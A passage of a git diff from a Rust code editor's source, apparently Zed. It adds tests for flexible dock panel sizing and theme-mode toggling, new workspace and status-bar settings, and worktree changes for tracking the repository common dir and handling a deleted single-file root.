MultiWorkspace::test_new(project, window, cx)); + let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()); + + workspace.update(cx, |workspace, _cx| { + workspace.set_random_database_id(); + workspace.bounds.size.width = px(800.); + }); + + let panel = workspace.update_in(cx, |workspace, window, cx| { + let item = cx.new(|cx| { + TestItem::new(cx).with_project_items(&[TestProjectItem::new(1, "one.txt", cx)]) + }); + workspace.add_item_to_active_pane(Box::new(item), None, true, window, cx); + + let panel = cx.new(|cx| TestPanel::new_flexible(DockPosition::Right, 100, cx)); + workspace.add_panel(panel.clone(), window, cx); + workspace.toggle_dock(DockPosition::Right, window, cx); + panel + }); + + workspace.update_in(cx, |workspace, window, cx| { + workspace.resize_right_dock(px(300.), window, cx); + }); + + cx.run_until_parked(); + + let persisted = workspace + .read_with(cx, |workspace, cx| { + workspace.persisted_panel_size_state(TestPanel::panel_key(), cx) + }) + .expect("flexible panel state should be persisted to KVP"); + assert_eq!( + persisted.size, None, + "flexible panel should not persist a redundant pixel size" + ); + let original_ratio = persisted.flex.expect("panel's flex should be persisted"); + + // Remove the panel and re-add: both size and ratio should be restored. + workspace.update_in(cx, |workspace, window, cx| { + workspace.remove_panel(&panel, window, cx); + }); + + workspace.update_in(cx, |workspace, window, cx| { + let new_panel = cx.new(|cx| TestPanel::new_flexible(DockPosition::Right, 100, cx)); + workspace.add_panel(new_panel, window, cx); + + let right_dock = workspace.right_dock().read(cx); + let size_state = right_dock + .panel::() + .and_then(|p| right_dock.stored_panel_size_state(&p)) + .expect("re-added flexible panel should have restored size state from KVP"); + assert_eq!( + size_state.size, None, + "re-added flexible panel should not have a persisted pixel size" + ); + assert_eq!( + size_state.flex, + Some(original_ratio), + "re-added flexible panel should restore persisted flex" + ); + }); + } + } + + #[gpui::test] + async fn test_flexible_panel_left_dock_sizing(cx: &mut gpui::TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + + let project = Project::test(fs, [], cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project, window, cx)); + let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()); + + workspace.update(cx, |workspace, _cx| { + workspace.bounds.size.width = px(900.); + }); + + // Step 1: Add a tab to the center pane then open a flexible panel in the left + // dock. With one full-width center pane the default ratio is 0.5, so the panel + // and the center pane each take half the workspace width. + workspace.update_in(cx, |workspace, window, cx| { + let item = cx.new(|cx| { + TestItem::new(cx).with_project_items(&[TestProjectItem::new(1, "one.txt", cx)]) + }); + workspace.add_item_to_active_pane(Box::new(item), None, true, window, cx); + + let panel = cx.new(|cx| TestPanel::new_flexible(DockPosition::Left, 100, cx)); + workspace.add_panel(panel, window, cx); + workspace.toggle_dock(DockPosition::Left, window, cx); + + let left_dock = workspace.left_dock().read(cx); + let left_width = workspace + .dock_size(&left_dock, window, cx) + .expect("left dock should have an active panel"); + + assert_eq!( + left_width, + workspace.bounds.size.width / 2., + "flexible left panel should split evenly with the center pane" + ); + }); + + // Step 2: Split the center pane vertically (top/bottom). Vertical splits do not + // change horizontal width fractions, so the flexible panel stays at the same + // width as each half of the split. + workspace.update_in(cx, |workspace, window, cx| { + workspace.split_pane( + workspace.active_pane().clone(), + SplitDirection::Down, + window, + cx, + ); + + let left_dock = workspace.left_dock().read(cx); + let left_width = workspace + .dock_size(&left_dock, window, cx) + .expect("left dock should still have an active panel after vertical split"); + + assert_eq!( + left_width, + workspace.bounds.size.width / 2., + "flexible left panel width should match each vertically-split pane" + ); + }); + + // Step 3: Open a fixed-width panel in the right dock. The right dock's default + // size reduces the available width, so the flexible left panel and the center + // panes all shrink proportionally to accommodate it. + workspace.update_in(cx, |workspace, window, cx| { + let panel = cx.new(|cx| TestPanel::new(DockPosition::Right, 200, cx)); + workspace.add_panel(panel, window, cx); + workspace.toggle_dock(DockPosition::Right, window, cx); + + let right_dock = workspace.right_dock().read(cx); + let right_width = workspace + .dock_size(&right_dock, window, cx) + .expect("right dock should have an active panel"); + + let left_dock = workspace.left_dock().read(cx); + let left_width = workspace + .dock_size(&left_dock, window, cx) + .expect("left dock should still have an active panel"); + + let available_width = workspace.bounds.size.width - right_width; + assert_eq!( + left_width, + available_width / 2., + "flexible left panel should shrink proportionally as the right dock takes space" + ); + }); + + // Step 4: Toggle the right dock's panel to flexible. Now both docks use + // flex sizing and the workspace width is divided among left-flex, center + // (implicit flex 1.0), and right-flex. + workspace.update_in(cx, |workspace, window, cx| { + let right_dock = workspace.right_dock().clone(); + let right_panel = right_dock + .read(cx) + .visible_panel() + .expect("right dock should have a visible panel") + .clone(); + workspace.toggle_dock_panel_flexible_size( + &right_dock, + right_panel.as_ref(), + window, + cx, + ); + + let right_dock = right_dock.read(cx); + let right_panel = right_dock + .visible_panel() + .expect("right dock should still have a visible panel"); + assert!( + right_panel.has_flexible_size(window, cx), + "right panel should now be flexible" + ); + + let right_size_state = right_dock + .stored_panel_size_state(right_panel.as_ref()) + .expect("right panel should have a stored size state after toggling"); + let right_flex = right_size_state + .flex + .expect("right panel should have a flex value after toggling"); + + let left_dock = workspace.left_dock().read(cx); + let left_width = workspace + .dock_size(&left_dock, window, cx) + .expect("left dock should still have an active panel"); + let right_width = workspace + .dock_size(&right_dock, window, cx) + .expect("right dock should still have an active panel"); + + let left_flex = workspace + .default_dock_flex(DockPosition::Left) + .expect("left dock should have a default flex"); + + let total_flex = left_flex + 1.0 + right_flex; + let expected_left = left_flex / total_flex * workspace.bounds.size.width; + let expected_right = right_flex / total_flex * workspace.bounds.size.width; + assert_eq!( + left_width, expected_left, + "flexible left panel should share workspace width via flex ratios" + ); + assert_eq!( + right_width, expected_right, + "flexible right panel should share workspace width via flex ratios" + ); + }); + } + struct TestModal(FocusHandle); impl TestModal { @@ -11590,13 +12864,11 @@ mod tests { panel_1.panel_id() ); assert_eq!( - left_dock.read(cx).active_panel_size(window, cx).unwrap(), - panel_1.size(window, cx) + workspace.dock_size(&left_dock.read(cx), window, cx), + Some(px(300.)) ); - left_dock.update(cx, |left_dock, cx| { - left_dock.resize_active_panel(Some(px(1337.)), window, cx) - }); + workspace.resize_left_dock(px(1337.), window, cx); assert_eq!( workspace .right_dock() @@ -11626,7 +12898,12 @@ mod tests { panel_1.panel_id() ); assert_eq!( - right_dock.read(cx).active_panel_size(window, cx).unwrap(), + right_dock + .read(cx) + .active_panel_size() + .unwrap() + .size + .unwrap(), px(1337.) ); @@ -11664,8 +12941,8 @@ mod tests { panel_1.panel_id() ); assert_eq!( - left_dock.read(cx).active_panel_size(window, cx).unwrap(), - px(1337.) + workspace.dock_size(&left_dock.read(cx), window, cx), + Some(px(1337.)) ); // And the right dock should be closed as it no longer has any panels. assert!(!workspace.right_dock().read(cx).is_open()); @@ -11681,8 +12958,8 @@ mod tests { // since the panel orientation changed from vertical to horizontal. let bottom_dock = workspace.bottom_dock(); assert_eq!( - bottom_dock.read(cx).active_panel_size(window, cx).unwrap(), - panel_1.size(window, cx), + workspace.dock_size(&bottom_dock.read(cx), window, cx), + Some(px(300.)) ); // Close bottom dock and move panel_1 back to the left. bottom_dock.update(cx, |bottom_dock, cx| { @@ -13240,6 +14517,12 @@ mod tests { cx.add_window(|window, cx| MultiWorkspace::test_new(project_a.clone(), window, cx)); cx.run_until_parked(); + multi_workspace_handle + .update(cx, |mw, _window, cx| { + mw.open_sidebar(cx); + }) + .unwrap(); + let workspace_a = multi_workspace_handle .read_with(cx, |mw, _| mw.workspace().clone()) .unwrap(); @@ -13253,7 +14536,8 @@ mod tests { // Switch to workspace A multi_workspace_handle .update(cx, |mw, window, cx| { - mw.activate_index(0, window, cx); + let workspace = mw.workspaces().next().unwrap().clone(); + mw.activate(workspace, window, cx); }) .unwrap(); @@ -13298,7 +14582,8 @@ mod tests { // Switch to workspace B multi_workspace_handle .update(cx, |mw, window, cx| { - mw.activate_index(1, window, cx); + let workspace = mw.workspaces().nth(1).unwrap().clone(); + mw.activate(workspace, window, cx); }) .unwrap(); cx.run_until_parked(); @@ -13306,7 +14591,8 @@ mod tests { // Switch back to workspace A multi_workspace_handle .update(cx, |mw, window, cx| { - mw.activate_index(0, window, cx); + let workspace = mw.workspaces().next().unwrap().clone(); + mw.activate(workspace, window, cx); }) .unwrap(); cx.run_until_parked(); @@ -13339,10 +14625,79 @@ mod tests { cx.update(|cx| { let settings_store = SettingsStore::test(cx); cx.set_global(settings_store); - theme::init(theme::LoadThemes::JustBase, cx); + cx.set_global(db::AppDatabase::test_new()); + theme_settings::init(theme::LoadThemes::JustBase, cx); }); } + #[gpui::test] + async fn test_toggle_theme_mode_persists_and_updates_active_theme(cx: &mut TestAppContext) { + use settings::{ThemeName, ThemeSelection}; + use theme::SystemAppearance; + use zed_actions::theme::ToggleMode; + + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + let settings_fs: Arc = fs.clone(); + + fs.insert_tree(path!("/root"), json!({ "file.rs": "fn main() {}\n" })) + .await; + + // Build a test project and workspace view so the test can invoke + // the workspace action handler the same way the UI would. + let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; + let (workspace, cx) = + cx.add_window_view(|window, cx| Workspace::test_new(project.clone(), window, cx)); + + // Seed the settings file with a plain static light theme so the + // first toggle always starts from a known persisted state. + workspace.update_in(cx, |_workspace, _window, cx| { + *SystemAppearance::global_mut(cx) = SystemAppearance(theme::Appearance::Light); + settings::update_settings_file(settings_fs.clone(), cx, |settings, _cx| { + settings.theme.theme = Some(ThemeSelection::Static(ThemeName("One Light".into()))); + }); + }); + cx.executor().advance_clock(Duration::from_millis(200)); + cx.run_until_parked(); + + // Confirm the initial persisted settings contain the static theme + // we just wrote before any toggling happens. + let settings_text = SettingsStore::load_settings(&settings_fs).await.unwrap(); + assert!(settings_text.contains(r#""theme": "One Light""#)); + + // Toggle once. This should migrate the persisted theme settings + // into light/dark slots and enable system mode. + workspace.update_in(cx, |workspace, window, cx| { + workspace.toggle_theme_mode(&ToggleMode, window, cx); + }); + cx.executor().advance_clock(Duration::from_millis(200)); + cx.run_until_parked(); + + // 1. Static -> Dynamic + // this assertion checks theme changed from static to dynamic. + let settings_text = SettingsStore::load_settings(&settings_fs).await.unwrap(); + let parsed: serde_json::Value = settings::parse_json_with_comments(&settings_text).unwrap(); + assert_eq!( + parsed["theme"], + serde_json::json!({ + "mode": "system", + "light": "One Light", + "dark": "One Dark" + }) + ); + + // 2. Toggle again, suppose it will change the mode to light + workspace.update_in(cx, |workspace, window, cx| { + workspace.toggle_theme_mode(&ToggleMode, window, cx); + }); + cx.executor().advance_clock(Duration::from_millis(200)); + cx.run_until_parked(); + + let settings_text = SettingsStore::load_settings(&settings_fs).await.unwrap(); + assert!(settings_text.contains(r#""mode": "light""#)); + } + fn dirty_project_item(id: u64, path: &str, cx: &mut App) -> Entity { let item = TestProjectItem::new(id, path, cx); item.update(cx, |item, _| { @@ -13413,4 +14768,72 @@ mod tests { assert!(panel.is_zoomed(window, cx)); }); } + + #[gpui::test] + async fn test_panels_stay_open_after_position_change_and_settings_update( + cx: &mut gpui::TestAppContext, + ) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + let project = Project::test(fs, [], cx).await; + let (workspace, cx) = + cx.add_window_view(|window, cx| Workspace::test_new(project, window, cx)); + + // Add two panels to the left dock and open it. + let (panel_a, panel_b) = workspace.update_in(cx, |workspace, window, cx| { + let panel_a = cx.new(|cx| TestPanel::new(DockPosition::Left, 100, cx)); + let panel_b = cx.new(|cx| TestPanel::new(DockPosition::Left, 101, cx)); + workspace.add_panel(panel_a.clone(), window, cx); + workspace.add_panel(panel_b.clone(), window, cx); + workspace.left_dock().update(cx, |dock, cx| { + dock.set_open(true, window, cx); + dock.activate_panel(0, window, cx); + }); + (panel_a, panel_b) + }); + + workspace.update_in(cx, |workspace, _, cx| { + assert!(workspace.left_dock().read(cx).is_open()); + }); + + // Simulate a feature flag changing default dock positions: both panels + // move from Left to Right. + workspace.update_in(cx, |_workspace, _window, cx| { + panel_a.update(cx, |p, _cx| p.position = DockPosition::Right); + panel_b.update(cx, |p, _cx| p.position = DockPosition::Right); + cx.update_global::(|_, _| {}); + }); + + // Both panels should now be in the right dock. + workspace.update_in(cx, |workspace, _, cx| { + let right_dock = workspace.right_dock().read(cx); + assert_eq!(right_dock.panels_len(), 2); + }); + + // Open the right dock and activate panel_b (simulating the user + // opening the panel after it moved). + workspace.update_in(cx, |workspace, window, cx| { + workspace.right_dock().update(cx, |dock, cx| { + dock.set_open(true, window, cx); + dock.activate_panel(1, window, cx); + }); + }); + + // Now trigger another SettingsStore change + workspace.update_in(cx, |_workspace, _window, cx| { + cx.update_global::(|_, _| {}); + }); + + workspace.update_in(cx, |workspace, _, cx| { + assert!( + workspace.right_dock().read(cx).is_open(), + "Right dock should still be open after a settings change" + ); + assert_eq!( + workspace.right_dock().read(cx).panels_len(), + 2, + "Both panels should still be in the right dock" + ); + }); + } } diff --git a/crates/workspace/src/workspace_settings.rs b/crates/workspace/src/workspace_settings.rs index 5575af3d7cf07fd7afd22ddbb78a620bab775714..ee0e80336d744cadaecdf0201525deddb8d5eec9 100644 --- a/crates/workspace/src/workspace_settings.rs +++ b/crates/workspace/src/workspace_settings.rs @@ -1,4 +1,4 @@ -use std::num::NonZeroUsize; +use std::{num::NonZeroUsize, time::Duration}; use crate::DockPosition; use collections::HashMap; @@ -35,6 +35,13 @@ pub struct WorkspaceSettings { pub use_system_window_tabs: bool, pub zoomed_padding: bool, pub window_decorations: settings::WindowDecorations, + pub focus_follows_mouse: FocusFollowsMouse, +} + +#[derive(Copy, Clone, Deserialize)] +pub struct FocusFollowsMouse { + pub enabled: bool, + pub debounce: Duration, } #[derive(Copy, Clone, PartialEq, Debug, Default)] @@ -113,6 +120,20 @@ impl Settings for WorkspaceSettings { use_system_window_tabs: workspace.use_system_window_tabs.unwrap(), zoomed_padding: workspace.zoomed_padding.unwrap(), window_decorations: workspace.window_decorations.unwrap(), + focus_follows_mouse: FocusFollowsMouse { + enabled: workspace + .focus_follows_mouse + .unwrap() + .enabled + .unwrap_or(false), + debounce: Duration::from_millis( + workspace + .focus_follows_mouse + .unwrap() + .debounce_ms + .unwrap_or(250), + ), + }, } } } @@ -132,6 +153,7 @@ impl Settings for TabBarSettings { #[derive(Deserialize, RegisterSetting)] pub struct StatusBarSettings { pub show: bool, + pub show_active_file: bool, pub active_language_button: bool, pub cursor_position_button: bool, pub line_endings_button: bool, @@ -143,6 +165,7 @@ impl Settings for StatusBarSettings { let status_bar = content.status_bar.clone().unwrap(); StatusBarSettings { show: status_bar.show.unwrap(), + show_active_file: status_bar.show_active_file.unwrap(), active_language_button: status_bar.active_language_button.unwrap(), cursor_position_button: status_bar.cursor_position_button.unwrap(), line_endings_button: status_bar.line_endings_button.unwrap(), diff --git a/crates/worktree/Cargo.toml b/crates/worktree/Cargo.toml index 788333b5e801f2a0bb22558945d2f142b50ef0a5..6d8faad3dc495a02e054f3fa652f5815f301cf3f 100644 --- a/crates/worktree/Cargo.toml +++ b/crates/worktree/Cargo.toml @@ -21,7 +21,7 @@ workspace = true [features] test-support = [ "gpui/test-support", - "http_client/test-support", + "language/test-support", "pretty_assertions", "settings/test-support", @@ -63,9 +63,7 @@ ztracing.workspace = true [dev-dependencies] clock = { workspace = true, features = ["test-support"] } collections = { workspace = true, features = ["test-support"] } -git2.workspace = true gpui = { workspace = true, features = ["test-support"] } -http_client.workspace = true paths = { workspace = true, features = ["test-support"] } rand.workspace = true rpc = { workspace = true, features = ["test-support"] } diff --git a/crates/worktree/src/worktree.rs b/crates/worktree/src/worktree.rs index 69b0be24e7ffb09d3fe759ec0bd3d54b54db21d3..864858073db70c984e61dbf43bf98be44f6c1c58 100644 --- a/crates/worktree/src/worktree.rs +++ b/crates/worktree/src/worktree.rs @@ -7,7 +7,9 @@ use chardetng::EncodingDetector; use clock::ReplicaId; use collections::{HashMap, HashSet, VecDeque}; use encoding_rs::Encoding; -use fs::{Fs, MTime, PathEvent, RemoveOptions, Watcher, copy_recursive, read_dir_items}; +use fs::{ + Fs, MTime, PathEvent, PathEventKind, RemoveOptions, Watcher, copy_recursive, read_dir_items, +}; use futures::{ FutureExt as _, Stream, StreamExt, channel::{ @@ -128,6 +130,7 @@ pub struct LocalWorktree { scan_requests_tx: channel::Sender, path_prefixes_to_scan_tx: channel::Sender, is_scanning: (watch::Sender, watch::Receiver), + snapshot_subscriptions: VecDeque<(usize, oneshot::Sender<()>)>, _background_scanner_tasks: Vec>, update_observer: Option, fs: Arc, @@ -173,6 +176,7 @@ pub struct Snapshot { root_char_bag: CharBag, entries_by_path: SumTree, entries_by_id: SumTree, + root_repo_common_dir: Option>, always_included_entries: Vec>, /// A number that increases every time the worktree begins scanning @@ -267,6 +271,12 @@ struct BackgroundScannerState { scanning_enabled: bool, } +#[derive(Clone, Debug, Eq, PartialEq)] +struct EventRoot { + path: Arc, + was_rescanned: bool, +} + #[derive(Debug, Clone)] struct LocalRepositoryEntry { work_directory_id: ProjectEntryId, @@ -280,9 +290,11 @@ struct LocalRepositoryEntry { dot_git_abs_path: Arc, /// Absolute path to the "commondir" for this repository. /// - /// This is always a directory. For a normal repository, this is the same as dot_git_abs_path, - /// but in the case of a submodule or a worktree it is the path to the "parent" .git directory - /// from which the submodule/worktree was derived. + /// This is always a directory. For a normal repository, this is the same as + /// `dot_git_abs_path`. For a linked worktree, this is the main repo's `.git` + /// directory (resolved from the worktree's `commondir` file). For a submodule, + /// this equals `repository_dir_abs_path` (submodules don't have a `commondir` + /// file). common_dir_abs_path: Arc, /// Absolute path to the directory holding the repository's state. /// @@ -344,6 +356,7 @@ enum ScanState { RootUpdated { new_path: Arc, }, + RootDeleted, } struct UpdateObservationState { @@ -356,7 +369,10 @@ struct UpdateObservationState { pub enum Event { UpdatedEntries(UpdatedEntriesSet), UpdatedGitRepositories(UpdatedGitRepositoriesSet), + UpdatedRootRepoCommonDir, DeletedEntry(ProjectEntryId), + /// The worktree root itself has been deleted (for single-file worktrees) + Deleted, } impl EventEmitter for Worktree {} @@ -393,6 +409,10 @@ impl Worktree { None }; + let root_repo_common_dir = discover_root_repo_common_dir(&abs_path, fs.as_ref()) + .await + .map(SanitizedPath::from_arc); + Ok(cx.new(move |cx: &mut Context| { let mut snapshot = LocalSnapshot { ignores_by_parent_abs_path: Default::default(), @@ -412,6 +432,7 @@ impl Worktree { ), root_file_handle, }; + snapshot.root_repo_common_dir = root_repo_common_dir; let worktree_id = snapshot.id(); let settings_location = Some(SettingsLocation { @@ -464,6 +485,7 @@ impl Worktree { next_entry_id, snapshot, is_scanning: watch::channel_with(true), + snapshot_subscriptions: Default::default(), update_observer: None, scan_requests_tx, path_prefixes_to_scan_tx, @@ -549,6 +571,7 @@ impl Worktree { this.update(cx, |this, cx| { let mut entries_changed = false; let this = this.as_remote_mut().unwrap(); + let old_root_repo_common_dir = this.snapshot.root_repo_common_dir.clone(); { let mut lock = this.background_snapshot.lock(); this.snapshot = lock.0.clone(); @@ -564,6 +587,9 @@ impl Worktree { if entries_changed { cx.emit(Event::UpdatedEntries(Arc::default())); } + if this.snapshot.root_repo_common_dir != old_root_repo_common_dir { + cx.emit(Event::UpdatedRootRepoCommonDir); + } cx.notify(); while let Some((scan_id, _)) = this.snapshot_subscriptions.front() { if this.observed_snapshot(*scan_id) { @@ -708,6 +734,16 @@ impl Worktree { } } + pub fn wait_for_snapshot( + &mut self, + scan_id: usize, + ) -> impl Future> + use<> { + match self { + Worktree::Local(this) => this.wait_for_snapshot(scan_id).boxed(), + Worktree::Remote(this) => this.wait_for_snapshot(scan_id).boxed(), + } + } + #[cfg(feature = "test-support")] pub fn has_update_observer(&self) -> bool { match self { @@ -1084,6 +1120,7 @@ impl LocalWorktree { }; let fs_case_sensitive = fs.is_case_sensitive().await; + let is_single_file = snapshot.snapshot.root_dir().is_none(); let mut scanner = BackgroundScanner { fs, fs_case_sensitive, @@ -1106,6 +1143,7 @@ impl LocalWorktree { share_private_files, settings, watcher, + is_single_file, }; scanner @@ -1134,6 +1172,13 @@ impl LocalWorktree { ScanState::RootUpdated { new_path } => { this.update_abs_path_and_refresh(new_path, cx); } + ScanState::RootDeleted => { + log::info!( + "worktree root {} no longer exists, closing worktree", + this.abs_path().display() + ); + cx.emit(Event::Deleted); + } } }); } @@ -1149,6 +1194,13 @@ impl LocalWorktree { cx: &mut Context, ) { let repo_changes = self.changed_repos(&self.snapshot, &mut new_snapshot); + + new_snapshot.root_repo_common_dir = new_snapshot + .local_repo_for_work_directory_path(RelPath::empty()) + .map(|repo| SanitizedPath::from_arc(repo.common_dir_abs_path.clone())); + + let root_repo_common_dir_changed = + self.snapshot.root_repo_common_dir != new_snapshot.root_repo_common_dir; self.snapshot = new_snapshot; if let Some(share) = self.update_observer.as_mut() { @@ -1164,6 +1216,18 @@ impl LocalWorktree { if !repo_changes.is_empty() { cx.emit(Event::UpdatedGitRepositories(repo_changes)); } + if root_repo_common_dir_changed { + cx.emit(Event::UpdatedRootRepoCommonDir); + } + + while let Some((scan_id, _)) = self.snapshot_subscriptions.front() { + if self.snapshot.completed_scan_id >= *scan_id { + let (_, tx) = self.snapshot_subscriptions.pop_front().unwrap(); + tx.send(()).ok(); + } else { + break; + } + } } fn changed_repos( @@ -1280,6 +1344,28 @@ impl LocalWorktree { } } + pub fn wait_for_snapshot( + &mut self, + scan_id: usize, + ) -> impl Future> + use<> { + let (tx, rx) = oneshot::channel(); + if self.snapshot.completed_scan_id >= scan_id { + tx.send(()).ok(); + } else { + match self + .snapshot_subscriptions + .binary_search_by_key(&scan_id, |probe| probe.0) + { + Ok(ix) | Err(ix) => self.snapshot_subscriptions.insert(ix, (scan_id, tx)), + } + } + + async move { + rx.await?; + Ok(()) + } + } + pub fn snapshot(&self) -> LocalSnapshot { self.snapshot.clone() } @@ -1322,6 +1408,7 @@ impl LocalWorktree { path, disk_state: DiskState::Present { mtime: metadata.mtime, + size: metadata.len, }, is_local: true, is_private, @@ -1378,6 +1465,7 @@ impl LocalWorktree { path, disk_state: DiskState::Present { mtime: metadata.mtime, + size: metadata.len, }, is_local: true, is_private, @@ -1575,6 +1663,7 @@ impl LocalWorktree { path, disk_state: DiskState::Present { mtime: metadata.mtime, + size: metadata.len, }, entry_id: None, is_local: true, @@ -2148,6 +2237,7 @@ impl Snapshot { always_included_entries: Default::default(), entries_by_path: Default::default(), entries_by_id: Default::default(), + root_repo_common_dir: None, scan_id: 1, completed_scan_id: 0, } @@ -2173,6 +2263,12 @@ impl Snapshot { SanitizedPath::cast_arc_ref(&self.abs_path) } + pub fn root_repo_common_dir(&self) -> Option<&Arc> { + self.root_repo_common_dir + .as_ref() + .map(SanitizedPath::cast_arc_ref) + } + fn build_initial_update(&self, project_id: u64, worktree_id: u64) -> proto::UpdateWorktree { let mut updated_entries = self .entries_by_path @@ -2186,6 +2282,9 @@ impl Snapshot { worktree_id, abs_path: self.abs_path().to_string_lossy().into_owned(), root_name: self.root_name().to_proto(), + root_repo_common_dir: self + .root_repo_common_dir() + .map(|p| p.to_string_lossy().into_owned()), updated_entries, removed_entries: Vec::new(), scan_id: self.scan_id as u64, @@ -2331,6 +2430,10 @@ impl Snapshot { self.entries_by_path.edit(entries_by_path_edits, ()); self.entries_by_id.edit(entries_by_id_edits, ()); + self.root_repo_common_dir = update + .root_repo_common_dir + .map(|p| SanitizedPath::new_arc(Path::new(&p))); + self.scan_id = update.scan_id as usize; if update.is_last_update { self.completed_scan_id = update.scan_id as usize; @@ -2559,6 +2662,9 @@ impl LocalSnapshot { worktree_id, abs_path: self.abs_path().to_string_lossy().into_owned(), root_name: self.root_name().to_proto(), + root_repo_common_dir: self + .root_repo_common_dir() + .map(|p| p.to_string_lossy().into_owned()), updated_entries, removed_entries, scan_id: self.scan_id as u64, @@ -2708,7 +2814,7 @@ impl LocalSnapshot { for entry in self.entries_by_path.cursor::<()>(()) { if entry.is_file() { assert_eq!(files.next().unwrap().inode, entry.inode); - if (!entry.is_ignored && !entry.is_external) || entry.is_always_included { + if !entry.is_ignored || entry.is_always_included { assert_eq!(visible_files.next().unwrap().inode, entry.inode); } } @@ -2945,7 +3051,7 @@ impl BackgroundScannerState { self.snapshot.check_invariants(false); } - fn remove_path(&mut self, path: &RelPath) { + fn remove_path(&mut self, path: &RelPath, watcher: &dyn Watcher) { log::trace!("background scanner removing path {path:?}"); let mut new_entries; let removed_entries; @@ -2961,7 +3067,12 @@ impl BackgroundScannerState { self.snapshot.entries_by_path = new_entries; let mut removed_ids = Vec::with_capacity(removed_entries.summary().count); + let mut removed_dir_abs_paths = Vec::new(); for entry in removed_entries.cursor::<()>(()) { + if entry.is_dir() { + removed_dir_abs_paths.push(self.snapshot.absolutize(&entry.path)); + } + match self.removed_entries.entry(entry.inode) { hash_map::Entry::Occupied(mut e) => { let prev_removed_entry = e.get_mut(); @@ -2997,6 +3108,10 @@ impl BackgroundScannerState { .git_repositories .retain(|id, _| removed_ids.binary_search(id).is_err()); + for removed_dir_abs_path in removed_dir_abs_paths { + watcher.remove(&removed_dir_abs_path).log_err(); + } + #[cfg(feature = "test-support")] self.snapshot.check_invariants(false); } @@ -3280,7 +3395,10 @@ impl File { worktree, path: entry.path.clone(), disk_state: if let Some(mtime) = entry.mtime { - DiskState::Present { mtime } + DiskState::Present { + mtime, + size: entry.size, + } } else { DiskState::New }, @@ -3309,7 +3427,7 @@ impl File { } else if proto.is_deleted { DiskState::Deleted } else if let Some(mtime) = proto.mtime.map(&Into::into) { - DiskState::Present { mtime } + DiskState::Present { mtime, size: 0 } } else { DiskState::New }; @@ -3375,8 +3493,7 @@ pub struct Entry { /// symlink. /// /// We only scan entries outside of the worktree once the symlinked - /// directory is expanded. External entries are treated like gitignored - /// entries in that they are not included in searches. + /// directory is expanded. pub is_external: bool, /// Whether this entry is considered to be a `.env` file. @@ -3581,8 +3698,7 @@ impl sum_tree::Item for Entry { type Summary = EntrySummary; fn summary(&self, _cx: ()) -> Self::Summary { - let non_ignored_count = if (self.is_ignored || self.is_external) && !self.is_always_included - { + let non_ignored_count = if self.is_ignored && !self.is_always_included { 0 } else { 1 @@ -3731,6 +3847,9 @@ struct BackgroundScanner { watcher: Arc, settings: WorktreeSettings, share_private_files: bool, + /// Whether this is a single-file worktree (root is a file, not a directory). + /// Used to determine if we should give up after repeated canonicalization failures. + is_single_file: bool, } #[derive(Copy, Clone, PartialEq)] @@ -3865,7 +3984,7 @@ impl BackgroundScanner { state.snapshot.completed_scan_id = state.snapshot.scan_id; } - self.send_status_update(false, SmallVec::new()).await; + self.send_status_update(false, SmallVec::new(), &[]).await; // Process any any FS events that occurred while performing the initial scan. // For these events, update events cannot be as precise, because we didn't @@ -3878,14 +3997,17 @@ impl BackgroundScanner { self.process_events( paths .into_iter() - .filter(|e| e.kind.is_some()) - .map(Into::into) + .filter(|event| event.kind.is_some()) .collect(), ) .await; } if let Some(abs_path) = containing_git_repository { - self.process_events(vec![abs_path]).await; + self.process_events(vec![PathEvent { + path: abs_path, + kind: Some(fs::PathEventKind::Changed), + }]) + .await; } // Continue processing events until the worktree is dropped. @@ -3916,10 +4038,14 @@ impl BackgroundScanner { }; if let Some(abs_path) = self.fs.canonicalize(&abs_path).await.log_err() { - self.process_events(vec![abs_path]).await; + self.process_events(vec![PathEvent { + path: abs_path, + kind: Some(fs::PathEventKind::Changed), + }]) + .await; } } - self.send_status_update(false, request.done).await; + self.send_status_update(false, request.done, &[]).await; } paths = fs_events_rx.next().fuse() => { @@ -3927,7 +4053,7 @@ impl BackgroundScanner { while let Poll::Ready(Some(more_paths)) = futures::poll!(fs_events_rx.next()) { paths.extend(more_paths); } - self.process_events(paths.into_iter().filter(|e| e.kind.is_some()).map(Into::into).collect()).await; + self.process_events(paths.into_iter().filter(|event| event.kind.is_some()).collect()).await; } _ = global_gitignore_events.next().fuse() => { @@ -3984,11 +4110,10 @@ impl BackgroundScanner { ) .await; - self.send_status_update(scanning, request.done).await + self.send_status_update(scanning, request.done, &[]).await } - async fn process_events(&self, mut abs_paths: Vec) { - log::trace!("process events: {abs_paths:?}"); + async fn process_events(&self, mut events: Vec) { let root_path = self.state.lock().await.snapshot.abs_path.clone(); let root_canonical_path = self.fs.canonicalize(root_path.as_path()).await; let root_canonical_path = match &root_canonical_path { @@ -4022,6 +4147,18 @@ impl BackgroundScanner { .ok(); } else { log::error!("root path could not be canonicalized: {err:#}"); + + // For single-file worktrees, if we can't canonicalize and the file handle + // fallback also failed, the file is gone - close the worktree + if self.is_single_file { + log::info!( + "single-file worktree root {:?} no longer exists, marking as deleted", + root_path.as_path() + ); + self.status_updates_tx + .unbounded_send(ScanState::RootDeleted) + .ok(); + } } return; } @@ -4032,11 +4169,25 @@ impl BackgroundScanner { let skipped_files_in_dot_git = [COMMIT_MESSAGE, INDEX_LOCK]; let skipped_dirs_in_dot_git = [FSMONITOR_DAEMON, LFS_DIR]; - let mut relative_paths = Vec::with_capacity(abs_paths.len()); + let mut relative_paths = Vec::with_capacity(events.len()); let mut dot_git_abs_paths = Vec::new(); let mut work_dirs_needing_exclude_update = Vec::new(); - abs_paths.sort_unstable(); - abs_paths.dedup_by(|a, b| a.starts_with(b)); + events.sort_unstable_by(|left, right| left.path.cmp(&right.path)); + events.dedup_by(|left, right| { + if left.path == right.path { + if matches!(left.kind, Some(fs::PathEventKind::Rescan)) { + right.kind = left.kind; + } + true + } else if left.path.starts_with(&right.path) { + if matches!(left.kind, Some(fs::PathEventKind::Rescan)) { + right.kind = left.kind; + } + true + } else { + false + } + }); { let snapshot = &self.state.lock().await.snapshot; @@ -4052,8 +4203,8 @@ impl BackgroundScanner { } } - for (ix, abs_path) in abs_paths.iter().enumerate() { - let abs_path = &SanitizedPath::new(&abs_path); + for 